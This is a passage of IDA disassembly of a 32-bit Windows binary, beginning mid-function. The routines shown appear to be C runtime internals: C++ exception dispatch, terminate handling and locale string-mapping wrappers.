arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 2Ch
mov ecx, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_10]
mov eax, [ebx+4]
cmp eax, 80h
push esi
push edi
mov [ebp+var_1], 0
jg short loc_40BA2A
movsx ecx, byte ptr [ecx+8]
jmp short loc_40BA2D
; ---------------------------------------------------------------------------
loc_40BA2A: ; CODE XREF: sub_40BA07+1B�j
mov ecx, [ecx+8]
loc_40BA2D: ; CODE XREF: sub_40BA07+21�j
cmp ecx, 0FFFFFFFFh
mov [ebp+var_8], ecx
jl short loc_40BA39
cmp ecx, eax
jl short loc_40BA3E
loc_40BA39: ; CODE XREF: sub_40BA07+2C�j
call sub_40BEA5
loc_40BA3E: ; CODE XREF: sub_40BA07+30�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
cmp [esi], edi
jnz loc_40BD19
cmp dword ptr [esi+10h], 3
mov ebx, 19930520h
jnz loc_40BB86
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BA76
cmp eax, 19930521h
jz short loc_40BA76
cmp eax, 19930522h
jnz loc_40BB86
loc_40BA76: ; CODE XREF: sub_40BA07+5B�j
; sub_40BA07+62�j
cmp dword ptr [esi+1Ch], 0
jnz loc_40BB86
call sub_40539D
cmp dword ptr [eax+88h], 0
jz loc_40BD58
call sub_40539D
mov esi, [eax+88h]
mov [ebp+arg_0], esi
call sub_40539D
mov eax, [eax+8Ch]
push 1
push esi
mov [ebp+arg_8], eax
call sub_4101B0
test eax, eax
pop ecx
pop ecx
jnz short loc_40BAC1
call sub_40BEA5
loc_40BAC1: ; CODE XREF: sub_40BA07+B3�j
cmp [esi], edi
jnz short loc_40BAEB
cmp dword ptr [esi+10h], 3
jnz short loc_40BAEB
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BAE0
cmp eax, 19930521h
jz short loc_40BAE0
cmp eax, 19930522h
jnz short loc_40BAEB
loc_40BAE0: ; CODE XREF: sub_40BA07+C9�j
; sub_40BA07+D0�j
cmp dword ptr [esi+1Ch], 0
jnz short loc_40BAEB
call sub_40BEA5
loc_40BAEB: ; CODE XREF: sub_40BA07+BC�j
; sub_40BA07+C2�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz loc_40BB86
call sub_40539D
mov edi, [eax+94h]
call sub_40539D
push [ebp+arg_0]
xor esi, esi
mov [eax+94h], esi
call sub_40B43B
test al, al
pop ecx
jnz short loc_40BB7E
xor ebx, ebx
cmp [edi], ebx
jle short loc_40BB45
loc_40BB28: ; CODE XREF: sub_40BA07+13C�j
mov eax, [edi+4]
mov ecx, [ebx+eax+4]
push offset off_423E50
call sub_403017
test al, al
jnz short loc_40BB4A
inc esi
add ebx, 10h
cmp esi, [edi]
jl short loc_40BB28
loc_40BB45: ; CODE XREF: sub_40BA07+11F�j
; sub_40BA07+31C�j
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40BB4A: ; CODE XREF: sub_40BA07+134�j
push 1
push [ebp+arg_0]
call sub_40B3C2
pop ecx
pop ecx
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_2C]
mov [ebp+arg_0], offset dword_41DC2C
call sub_402C0C
push offset dword_4216E4
lea eax, [ebp+var_2C]
push eax
mov [ebp+var_2C], offset off_41DC24
call sub_4041BB
loc_40BB7E: ; CODE XREF: sub_40BA07+119�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
loc_40BB86: ; CODE XREF: sub_40BA07+50�j
; sub_40BA07+69�j ...
cmp [esi], edi
jnz loc_40BD16
cmp dword ptr [esi+10h], 3
jnz loc_40BD16
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BBB1
cmp eax, 19930521h
jz short loc_40BBB1
cmp eax, 19930522h
jnz loc_40BD16
loc_40BBB1: ; CODE XREF: sub_40BA07+196�j
; sub_40BA07+19D�j
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jbe loc_40BC7D
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+arg_18]
push edi
call sub_404466
add esp, 14h
mov edi, eax
loc_40BBD7: ; CODE XREF: sub_40BA07+26E�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jnb loc_40BC7A
mov eax, [ebp+var_8]
cmp [edi], eax
jg loc_40BC6F
cmp eax, [edi+4]
jg short loc_40BC6F
mov eax, [edi+10h]
mov [ebp+var_C], eax
mov eax, [edi+0Ch]
test eax, eax
mov [ebp+var_18], eax
jle short loc_40BC6F
loc_40BC03: ; CODE XREF: sub_40BA07+23C�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea ebx, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_14], eax
jle short loc_40BC38
loc_40BC15: ; CODE XREF: sub_40BA07+22F�j
push dword ptr [esi+1Ch]
mov eax, [ebx]
push eax
push [ebp+var_C]
mov [ebp+var_20], eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40BC47
dec [ebp+var_14]
add ebx, 4
cmp [ebp+var_14], eax
jg short loc_40BC15
loc_40BC38: ; CODE XREF: sub_40BA07+20C�j
dec [ebp+var_18]
add [ebp+var_C], 10h
cmp [ebp+var_18], 0
jg short loc_40BC03
jmp short loc_40BC6F
; ---------------------------------------------------------------------------
loc_40BC47: ; CODE XREF: sub_40BA07+224�j
push [ebp+arg_1C]
mov ebx, [ebp+var_C]
push [ebp+arg_18]
mov [ebp+var_1], 1
push [ebp+var_20]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
call sub_40B8A9
mov esi, [ebp+arg_0]
add esp, 1Ch
loc_40BC6F: ; CODE XREF: sub_40BA07+1E1�j
; sub_40BA07+1EA�j ...
inc [ebp+var_10]
add edi, 14h
jmp loc_40BBD7
; ---------------------------------------------------------------------------
loc_40BC7A: ; CODE XREF: sub_40BA07+1D6�j
mov edi, [ebp+arg_10]
loc_40BC7D: ; CODE XREF: sub_40BA07+1B1�j
cmp [ebp+arg_14], 0
jz short loc_40BC8D
push 1
push esi
call sub_40B3C2
pop ecx
pop ecx
loc_40BC8D: ; CODE XREF: sub_40BA07+27A�j
cmp [ebp+var_1], 0
jnz loc_40BD45
mov eax, [edi]
and eax, 1FFFFFFFh
cmp eax, 19930521h
jb loc_40BD45
mov edi, [edi+1Ch]
test edi, edi
jz loc_40BD45
push esi
call sub_40B43B
test al, al
pop ecx
jnz loc_40BD45
call sub_40539D
call sub_40539D
call sub_40539D
mov [eax+88h], esi
call sub_40539D
cmp [ebp+arg_1C], 0
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
push esi
jnz short loc_40BCF2
push [ebp+arg_4]
jmp short loc_40BCF5
; ---------------------------------------------------------------------------
loc_40BCF2: ; CODE XREF: sub_40BA07+2E4�j
push [ebp+arg_1C]
loc_40BCF5: ; CODE XREF: sub_40BA07+2E9�j
call sub_40423C
mov esi, [ebp+arg_10]
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
push dword ptr [esi+1Ch]
call sub_40B4B4
loc_40BD16: ; CODE XREF: sub_40BA07+181�j
; sub_40BA07+18B�j ...
mov ebx, [ebp+arg_10]
loc_40BD19: ; CODE XREF: sub_40BA07+41�j
cmp dword ptr [ebx+0Ch], 0
jbe short loc_40BD45
cmp [ebp+arg_14], 0
jnz loc_40BB45
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_8]
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_40B915
add esp, 20h
loc_40BD45: ; CODE XREF: sub_40BA07+28A�j
; sub_40BA07+29C�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40BD58
call sub_40BEA5
loc_40BD58: ; CODE XREF: sub_40BA07+85�j
; sub_40BA07+34A�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BA07 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41DC24
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD75 proc near ; CODE XREF: J8@F_7_S:004042AF�p
; J8@F_7_S:004042EA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_40539D
cmp dword ptr [eax+20Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_0]
mov edi, 0E06D7363h
mov esi, 1FFFFFFFh
mov ebx, 19930522h
jnz short loc_40BDBE
mov edx, [ecx]
cmp edx, edi
jz short loc_40BDBE
cmp edx, 80000026h
jz short loc_40BDBE
mov edx, [eax]
and edx, esi
cmp edx, ebx
jb short loc_40BDBE
test byte ptr [eax+20h], 1
jnz loc_40BE51
loc_40BDBE: ; CODE XREF: sub_40BD75+27�j
; sub_40BD75+2D�j ...
test byte ptr [ecx+4], 66h
jz short loc_40BDE7
cmp dword ptr [eax+4], 0
jz loc_40BE51
cmp [ebp+arg_14], 0
jnz short loc_40BE51
push 0FFFFFFFFh
push eax
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
jmp short loc_40BE51
; ---------------------------------------------------------------------------
loc_40BDE7: ; CODE XREF: sub_40BD75+4D�j
cmp dword ptr [eax+0Ch], 0
jnz short loc_40BDFF
mov edx, [eax]
and edx, esi
cmp edx, 19930521h
jb short loc_40BE51
cmp dword ptr [eax+1Ch], 0
jz short loc_40BE51
loc_40BDFF: ; CODE XREF: sub_40BD75+76�j
cmp [ecx], edi
jnz short loc_40BE35
cmp dword ptr [ecx+10h], 3
jb short loc_40BE35
cmp [ecx+14h], ebx
jbe short loc_40BE35
mov edx, [ecx+1Ch]
mov edx, [edx+8]
test edx, edx
jz short loc_40BE35
movzx esi, byte ptr [ebp+arg_1C]
push esi
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call edx
add esp, 20h
jmp short loc_40BE54
; ---------------------------------------------------------------------------
loc_40BE35: ; CODE XREF: sub_40BD75+8C�j
; sub_40BD75+92�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call sub_40BA07
add esp, 20h
loc_40BE51: ; CODE XREF: sub_40BD75+43�j
; sub_40BD75+53�j ...
xor eax, eax
inc eax
loc_40BE54: ; CODE XREF: sub_40BD75+BE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40BD75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE59 proc near ; CODE XREF: sub_40B11E:loc_40B152�p
; sub_40B258+22�j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040BE80 SIZE 00000012 BYTES
push 8
push offset dword_421720
call __SEH_prolog4
call sub_40539D
mov eax, [eax+78h]
test eax, eax
jz short loc_40BE87
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BE80
sub_40BE59 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_40BE59
loc_40BE80: ; CODE XREF: sub_40BE59+1E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BE87: ; CODE XREF: sub_40BE59+16�j
call sub_4101BD
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40BE92 proc near ; CODE XREF: sub_40B4B4+23�p
call sub_40539D
mov eax, [eax+7Ch]
test eax, eax
jz short loc_40BEA0
call eax
loc_40BEA0: ; CODE XREF: sub_40BE92+A�j
jmp sub_40BE59
sub_40BE92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEA5 proc near ; CODE XREF: sub_404466+1C�p
; sub_404466:loc_4044C7�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset dword_421740
call __SEH_prolog4
push ds:dword_42640C
call sub_405193
pop ecx
test eax, eax
jz short loc_40BED7
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BED0
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40BED0: ; CODE XREF: sub_40BEA5+22�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BED7: ; CODE XREF: sub_40BEA5+1A�j
jmp sub_40BE59
sub_40BEA5 endp
; =============== S U B R O U T I N E =======================================
sub_40BEDC proc near ; CODE XREF: sub_407B19+33�p
push offset sub_40BE59
call sub_405127
pop ecx
mov ds:dword_42640C, eax
retn
sub_40BEDC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEF0 proc near ; CODE XREF: sub_40456E+4A�p
; sub_40B29C+77�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_40EC54
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_40BF2F
mov ecx, 2
loc_40BF2F: ; CODE XREF: sub_40BEF0+38�j
push ecx
call sub_40EC54
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_40BEF0 endp
; =============== S U B R O U T I N E =======================================
sub_40BF3C proc near ; CODE XREF: sub_40BF57+220�p
; sub_40BF57+229�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jz short locret_40BF56
sub eax, 8
cmp dword ptr [eax], 0DDDDh
jnz short locret_40BF56
push eax
call sub_403603
pop ecx
locret_40BF56: ; CODE XREF: sub_40BF3C+6�j
; sub_40BF3C+11�j
retn
sub_40BF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF57 proc near ; CODE XREF: sub_40C2F9+2C�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
cmp ds:dword_426410, ebx
push edi
mov esi, ecx
jnz short loc_40BFAE
push ebx
push ebx
xor edi, edi
inc edi
push edi
push offset dword_41DC3C
push 100h
push ebx
call ds:dword_41D12C
test eax, eax
jz short loc_40BF99
mov ds:dword_426410, edi
jmp short loc_40BFAE
; ---------------------------------------------------------------------------
loc_40BF99: ; CODE XREF: sub_40BF57+38�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40BFAE
mov ds:dword_426410, 2
loc_40BFAE: ; CODE XREF: sub_40BF57+1D�j
; sub_40BF57+40�j ...
cmp [ebp+arg_C], ebx
jle short loc_40BFD5
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_40BFB9: ; CODE XREF: sub_40BF57+6A�j
dec ecx
cmp [eax], bl
jz short loc_40BFC6
inc eax
cmp ecx, ebx
jnz short loc_40BFB9
or ecx, 0FFFFFFFFh
loc_40BFC6: ; CODE XREF: sub_40BF57+65�j
mov eax, [ebp+arg_C]
sub eax, ecx
dec eax
cmp eax, [ebp+arg_C]
jge short loc_40BFD2
inc eax
loc_40BFD2: ; CODE XREF: sub_40BF57+78�j
mov [ebp+arg_C], eax
loc_40BFD5: ; CODE XREF: sub_40BF57+5A�j
mov eax, ds:dword_426410
cmp eax, 2
jz loc_40C18E
cmp eax, ebx
jz loc_40C18E
cmp eax, 1
jnz loc_40C1BF
cmp [ebp+arg_18], ebx
mov [ebp+var_8], ebx
jnz short loc_40C004
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C004: ; CODE XREF: sub_40BF57+A3�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_1C], ebx
push ebx
push ebx
push [ebp+arg_C]
setnz al
push [ebp+arg_8]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call esi
mov edi, eax
cmp edi, ebx
jz loc_40C1BF
jle short loc_40C076
push 0FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 2
jb short loc_40C076
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C05D
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C071
mov dword ptr [eax], 0CCCCh
jmp short loc_40C06E
; ---------------------------------------------------------------------------
loc_40C05D: ; CODE XREF: sub_40BF57+F1�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C071
mov dword ptr [eax], 0DDDDh
loc_40C06E: ; CODE XREF: sub_40BF57+104�j
add eax, 8
loc_40C071: ; CODE XREF: sub_40BF57+FC�j
; sub_40BF57+10F�j
mov [ebp+var_C], eax
jmp short loc_40C079
; ---------------------------------------------------------------------------
loc_40C076: ; CODE XREF: sub_40BF57+DA�j
; sub_40BF57+E6�j
mov [ebp+var_C], ebx
loc_40C079: ; CODE XREF: sub_40BF57+11D�j
cmp [ebp+var_C], ebx
jz loc_40C1BF
push edi
push [ebp+var_C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call esi
test eax, eax
jz loc_40C17D
mov esi, ds:dword_41D12C
push ebx
push ebx
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
mov ecx, eax
cmp ecx, ebx
mov [ebp+var_8], ecx
jz loc_40C17D
test word ptr [ebp+arg_4], 400h
jz short loc_40C0ED
cmp [ebp+arg_14], ebx
jz loc_40C17D
cmp ecx, [ebp+arg_14]
jg loc_40C17D
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
jmp loc_40C17D
; ---------------------------------------------------------------------------
loc_40C0ED: ; CODE XREF: sub_40BF57+16B�j
cmp ecx, ebx
jle short loc_40C136
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, 2
jb short loc_40C136
lea eax, [ecx+ecx+8]
cmp eax, 400h
ja short loc_40C11E
call sub_4104B0
mov esi, esp
cmp esi, ebx
jz short loc_40C17D
mov dword ptr [esi], 0CCCCh
add esi, 8
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C11E: ; CODE XREF: sub_40BF57+1AF�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C132
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C132: ; CODE XREF: sub_40BF57+1D0�j
mov esi, eax
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C136: ; CODE XREF: sub_40BF57+198�j
; sub_40BF57+1A4�j
xor esi, esi
loc_40C138: ; CODE XREF: sub_40BF57+1C5�j
; sub_40BF57+1DD�j
cmp esi, ebx
jz short loc_40C17D
push [ebp+var_8]
push esi
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D12C
test eax, eax
jz short loc_40C176
cmp [ebp+arg_14], ebx
push ebx
push ebx
jnz short loc_40C15F
push ebx
push ebx
jmp short loc_40C165
; ---------------------------------------------------------------------------
loc_40C15F: ; CODE XREF: sub_40BF57+202�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_40C165: ; CODE XREF: sub_40BF57+206�j
push [ebp+var_8]
push esi
push ebx
push [ebp+arg_18]
call ds:dword_41D138
mov [ebp+var_8], eax
loc_40C176: ; CODE XREF: sub_40BF57+1FB�j
push esi
call sub_40BF3C
pop ecx
loc_40C17D: ; CODE XREF: sub_40BF57+13E�j
; sub_40BF57+15F�j ...
push [ebp+var_C]
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C18E: ; CODE XREF: sub_40BF57+86�j
; sub_40BF57+8E�j
cmp [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_40C1A1
mov eax, [esi]
mov eax, [eax+14h]
mov [ebp+arg_0], eax
loc_40C1A1: ; CODE XREF: sub_40BF57+240�j
cmp [ebp+arg_18], ebx
jnz short loc_40C1AE
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C1AE: ; CODE XREF: sub_40BF57+24D�j
push [ebp+arg_0]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jnz short loc_40C1C6
loc_40C1BF: ; CODE XREF: sub_40BF57+97�j
; sub_40BF57+D4�j ...
xor eax, eax
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C1C6: ; CODE XREF: sub_40BF57+266�j
cmp eax, [ebp+arg_18]
jz loc_40C2AA
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_4102F7
add esp, 18h
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40C1BF
mov esi, ds:dword_41D130
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call esi
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C20D
loc_40C206: ; CODE XREF: sub_40BF57+2D0�j
; sub_40BF57+2F9�j
xor esi, esi
jmp loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C20D: ; CODE XREF: sub_40BF57+2AD�j
jle short loc_40C24C
cmp eax, 0FFFFFFE0h
ja short loc_40C24C
add eax, 8
cmp eax, 400h
ja short loc_40C234
call sub_4104B0
mov edi, esp
cmp edi, ebx
jz short loc_40C206
mov dword ptr [edi], 0CCCCh
add edi, 8
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C234: ; CODE XREF: sub_40BF57+2C5�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C248
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C248: ; CODE XREF: sub_40BF57+2E6�j
mov edi, eax
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C24C: ; CODE XREF: sub_40BF57:loc_40C20D�j
; sub_40BF57+2BB�j
xor edi, edi
loc_40C24E: ; CODE XREF: sub_40BF57+2DB�j
; sub_40BF57+2F3�j
cmp edi, ebx
jz short loc_40C206
push [ebp+var_8]
push ebx
push edi
call sub_407B70
add esp, 0Ch
push [ebp+var_8]
push edi
push [ebp+arg_C]
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C27C
xor esi, esi
jmp short loc_40C2A1
; ---------------------------------------------------------------------------
loc_40C27C: ; CODE XREF: sub_40BF57+31F�j
push [ebp+arg_14]
lea eax, [ebp+var_8]
push [ebp+arg_10]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_14]
call sub_4102F7
mov esi, eax
mov [ebp+var_10], esi
add esp, 18h
neg esi
sbb esi, esi
and esi, [ebp+var_8]
loc_40C2A1: ; CODE XREF: sub_40BF57+323�j
push edi
call sub_40BF3C
pop ecx
jmp short loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C2AA: ; CODE XREF: sub_40BF57+272�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D130
mov esi, eax
loc_40C2C4: ; CODE XREF: sub_40BF57+2B1�j
; sub_40BF57+351�j
cmp [ebp+var_C], ebx
jz short loc_40C2D2
push [ebp+var_C]
call sub_403603
pop ecx
loc_40C2D2: ; CODE XREF: sub_40BF57+370�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_40C2E5
cmp [ebp+arg_10], eax
jz short loc_40C2E5
push eax
call sub_403603
pop ecx
loc_40C2E5: ; CODE XREF: sub_40BF57+380�j
; sub_40BF57+385�j
mov eax, esi
loc_40C2E7: ; CODE XREF: sub_40BF57+232�j
; sub_40BF57+26A�j
lea esp, [ebp-20h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40BF57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2F9 proc near ; CODE XREF: sub_404816+B6�p
; sub_404816+DB�p ...
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_20]
lea ecx, [ebp+var_10]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40BF57
add esp, 20h
cmp [ebp+var_4], 0
jz short locret_40C33A
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C33A: ; CODE XREF: sub_40C2F9+38�j
leave
retn
sub_40C2F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C33C proc near ; CODE XREF: sub_40C4F4+29�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, ds:dword_426414
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov edi, ecx
jnz short loc_40C395
lea eax, [ebp+var_8]
push eax
xor esi, esi
inc esi
push esi
push offset dword_41DC3C
push esi
call ds:dword_41D124
test eax, eax
jz short loc_40C37B
mov ds:dword_426414, esi
jmp short loc_40C3AF
; ---------------------------------------------------------------------------
loc_40C37B: ; CODE XREF: sub_40C33C+35�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40C390
push 2
pop eax
mov ds:dword_426414, eax
jmp short loc_40C395
; ---------------------------------------------------------------------------
loc_40C390: ; CODE XREF: sub_40C33C+48�j
mov eax, ds:dword_426414
loc_40C395: ; CODE XREF: sub_40C33C+1D�j
; sub_40C33C+52�j
cmp eax, 2
jz loc_40C46D
cmp eax, ebx
jz loc_40C46D
cmp eax, 1
jnz loc_40C497
loc_40C3AF: ; CODE XREF: sub_40C33C+3D�j
cmp [ebp+arg_10], ebx
mov [ebp+var_8], ebx
jnz short loc_40C3BF
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C3BF: ; CODE XREF: sub_40C33C+79�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_18], ebx
push ebx
push ebx
push [ebp+arg_8]
setnz al
push [ebp+arg_4]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call esi
mov edi, eax
cmp edi, ebx
jz loc_40C497
jle short loc_40C42A
cmp edi, 7FFFFFF0h
ja short loc_40C42A
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C414
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C428
mov dword ptr [eax], 0CCCCh
jmp short loc_40C425
; ---------------------------------------------------------------------------
loc_40C414: ; CODE XREF: sub_40C33C+C3�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C428
mov dword ptr [eax], 0DDDDh
loc_40C425: ; CODE XREF: sub_40C33C+D6�j
add eax, 8
loc_40C428: ; CODE XREF: sub_40C33C+CE�j
; sub_40C33C+E1�j
mov ebx, eax
loc_40C42A: ; CODE XREF: sub_40C33C+B0�j
; sub_40C33C+B8�j
test ebx, ebx
jz short loc_40C497
lea eax, [edi+edi]
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push edi
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call esi
test eax, eax
jz short loc_40C461
push [ebp+arg_C]
push eax
push ebx
push [ebp+arg_0]
call ds:dword_41D124
mov [ebp+var_8], eax
loc_40C461: ; CODE XREF: sub_40C33C+112�j
push ebx
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C46D: ; CODE XREF: sub_40C33C+5C�j
; sub_40C33C+64�j
xor esi, esi
cmp [ebp+arg_14], ebx
jnz short loc_40C47C
